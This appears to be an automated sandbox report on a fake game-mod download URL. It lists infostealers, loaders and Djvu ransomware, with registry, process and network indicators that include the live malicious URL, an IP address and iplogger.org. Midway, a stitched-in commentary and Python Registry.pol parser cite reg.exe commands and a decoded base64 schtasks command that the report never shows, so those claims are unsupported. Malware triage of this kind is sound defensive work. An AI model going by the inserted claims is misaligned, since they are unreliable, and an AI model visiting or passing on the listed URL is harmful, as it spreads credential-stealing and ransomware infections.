Analysis Overview
Threat Level: Known bad
The file https://duikosgreec.pro/?param=league+of+legends+first+person+mod was found to be: Known bad.
Malicious Activity Summary
Stealc
Glupteba
Detect ZGRat V1
RisePro
RedLine payload
SmokeLoader
RedLine
Glupteba payload
Djvu Ransomware
Detected Djvu ransomware
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Stops running service(s)
Modifies Windows Firewall
Creates new service(s)
Downloads MZ/PE file
Checks BIOS information in registry
Unexpected DNS network traffic destination
Loads dropped DLL
Reads user/profile data of web browsers
Identifies Wine through registry keys
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Checks installed software on the system
Checks whether UAC is enabled
Drops file in System32 directory
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Detects Pyinstaller
Program crash
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Kills process with taskkill
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
NTFS ADS
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Enumerates processes with tasklist
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-21 11:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-21 11:15
Reported
2024-02-21 11:18
Platform
win11-20240214-en
Max time kernel
72s
Max time network
224s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1002246581-1510179080-2205450789-1000\Software\Wine | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp | N/A |
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 91.211.247.248 | N/A | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Desktop\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Desktop\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Desktop\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Desktop\setup.exe | N/A |
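The four rows above show setup.exe creating Machine\Registry.pol under System32\GroupPolicy and touching gpt.ini, which is the on-disk form of a local machine Group Policy; the report does not include the file's contents. Such a file only takes effect at the next policy refresh, and the base64 in the schtasks command later in this report decodes (UTF-16LE) to "start-process -WindowStyle Hidden gpupdate.exe /force". The parser below is an added example for triage, not part of the sandbox output or of the malware: it reads the MS-GPREG "PReg" version 1 layout (signature, DWORD version, then [key;value;type;size;data] records with UTF-16LE strings and delimiters) so a responder can see what a recovered Registry.pol would apply. The sample file is constructed here, mirroring the two Defender policy values the reg.exe commands in this report set plus one unrelated filler record; all function and constant names are my own.

```python
"""Parser for a Registry.pol like the one setup.exe wrote to System32\\GroupPolicy\\Machine.
Added example; the sample bytes are constructed, not the file from the detonation."""
import struct

PREG_MAGIC = b'PReg'
REG_TYPES = {1: 'REG_SZ', 2: 'REG_EXPAND_SZ', 3: 'REG_BINARY', 4: 'REG_DWORD', 7: 'REG_MULTI_SZ'}
DEFENDER_POLICY_PREFIX = r'software\policies\microsoft\windows defender'


def _u16(text):
    return text.encode('utf-16-le')


def build_registry_pol(entries):
    """Serialize (key, value_name, reg_type, data_bytes) tuples into PReg v1 bytes."""
    out = bytearray(PREG_MAGIC + struct.pack('<I', 1))
    for key, name, rtype, data in entries:
        out += _u16('[') + _u16(key) + b'\x00\x00' + _u16(';') + _u16(name) + b'\x00\x00'
        out += _u16(';') + struct.pack('<I', rtype) + _u16(';') + struct.pack('<I', len(data))
        out += _u16(';') + data + _u16(']')
    return bytes(out)


def _read_wstr(buf, pos):
    """Null-terminated UTF-16LE string at pos -> (text, position after the terminator)."""
    end = pos
    while True:
        if end + 2 > len(buf):
            raise ValueError('unterminated UTF-16LE string at offset %d' % pos)
        if buf[end:end + 2] == b'\x00\x00':
            return buf[pos:end].decode('utf-16-le'), end + 2
        end += 2


def _expect(buf, pos, token):
    if buf[pos:pos + 2] != token:
        raise ValueError('expected %r at offset %d' % (token, pos))
    return pos + 2


def _dword(buf, pos):
    if pos + 4 > len(buf):
        raise ValueError('truncated DWORD at offset %d' % pos)
    return struct.unpack_from('<I', buf, pos)[0]


def _decode_data(rtype, data):
    if rtype == 4 and len(data) == 4:
        return struct.unpack('<I', data)[0]
    if rtype in (1, 2):
        return data.decode('utf-16-le', errors='replace').rstrip('\x00')
    return data.hex()  # REG_BINARY, REG_MULTI_SZ and unknown types are left raw


def parse_registry_pol(buf):
    """Parse PReg v1 bytes into a list of {'key', 'name', 'type', 'data'} dicts."""
    if len(buf) < 8 or buf[:4] != PREG_MAGIC or _dword(buf, 4) != 1:
        raise ValueError('not a PReg version 1 Registry.pol')
    sep, pos, entries = _u16(';'), 8, []
    while pos < len(buf):
        pos = _expect(buf, pos, _u16('['))
        key, pos = _read_wstr(buf, pos)
        pos = _expect(buf, pos, sep)
        name, pos = _read_wstr(buf, pos)
        pos = _expect(buf, pos, sep)
        rtype = _dword(buf, pos)
        pos = _expect(buf, pos + 4, sep)
        size = _dword(buf, pos)
        pos = _expect(buf, pos + 4, sep)
        data = buf[pos:pos + size]
        if len(data) != size:
            raise ValueError('truncated data at offset %d' % pos)
        pos = _expect(buf, pos + size, _u16(']'))
        entries.append({'key': key, 'name': name,
                        'type': REG_TYPES.get(rtype, 'type_0x%x' % rtype),
                        'data': _decode_data(rtype, data)})
    return entries


def defender_policy_findings(entries):
    """Records under the Windows Defender policy key, the subtree the reg.exe commands in this report write."""
    return [e for e in entries if e['key'].lower().startswith(DEFENDER_POLICY_PREFIX)]


# Constructed sample: the two values the report's reg.exe commands set, plus an unrelated filler record.
SAMPLE_POL = build_registry_pol([
    (r'Software\Policies\Microsoft\Windows Defender\Spynet', 'SpyNetReporting', 4, struct.pack('<I', 0)),
    (r'Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions', 'exe', 1, _u16('0') + b'\x00\x00'),
    (r'Software\Policies\Example\Filler', 'Unrelated', 1, _u16('x') + b'\x00\x00'),
])

if __name__ == '__main__':
    for e in defender_policy_findings(parse_registry_pol(SAMPLE_POL)):
        print(e['key'], e['name'], e['type'], e['data'])
```

On a live host the same parser applies to C:\Windows\System32\GroupPolicy\Machine\Registry.pol directly; keys in a Machine\Registry.pol are relative to HKLM, which is why the Defender filter matches on the Software\Policies\... prefix rather than on a full HKLM\ path. Records whose string or DWORD framing is inconsistent raise ValueError instead of being silently skipped, so a deliberately malformed file is reported rather than under-counted.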
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Desktop\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1002246581-1510179080-2205450789-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\file_release_v3.rar:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duikosgreec.pro/?param=league+of+legends+first+person+mod
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5972 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\file_release_v3.rar"
C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe
"C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe"
C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe
"C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe"
C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe
"C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe"
C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe
"C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe"
C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe
"C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe"
C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe
"C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe"
C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe
"C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe"
